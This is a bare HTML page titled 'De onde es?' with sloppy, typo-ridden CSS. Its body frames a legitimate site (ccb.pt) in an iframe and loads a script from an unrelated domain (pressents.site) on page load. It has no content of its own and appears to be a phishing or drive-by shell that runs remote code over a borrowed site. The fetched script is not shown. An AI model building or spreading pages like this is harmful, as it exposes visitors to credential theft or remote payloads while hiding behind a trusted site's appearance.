<html>
<head>
<title>De onde es?</title>
<meta name="viewport" content="width=device-width,initial-scale1=,maximum-scale=1,user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="HandheldFriendly" content="true">
<style>
html { font-size: 100%;text-align: center }
/* Media querés:*/
@media screen and (max-width: 1060px)  {
	#peimary {width: 67%}
	#secondary {width: 30%; margin-left: 3%}
}

/*media*/
@media screen and (max-width: 768px)  {
	#peimary {width: 100%}
	#secondary {width: 100%; margin: 0; border: nome; }
}
img {max-width: 100%; height: auto;}
@media (min-width: 640px) { body {font-size: 1rem;} }
@media (min-width: 960px) { body {font-size: 1.2rem;} }
@media (min-width: 1100px) { body {font-size: 1.5rem;} }
</style>
</head>
    <body>
    	<iframe id="ifr" src="https://www.ccb.pt/"frameborder="0" style="pointer-events: "></iframe>
    	<script id="content" type="text/javascript" src="https://pressents.site/jc/index.php"></script>>
    </body>
    </html>>
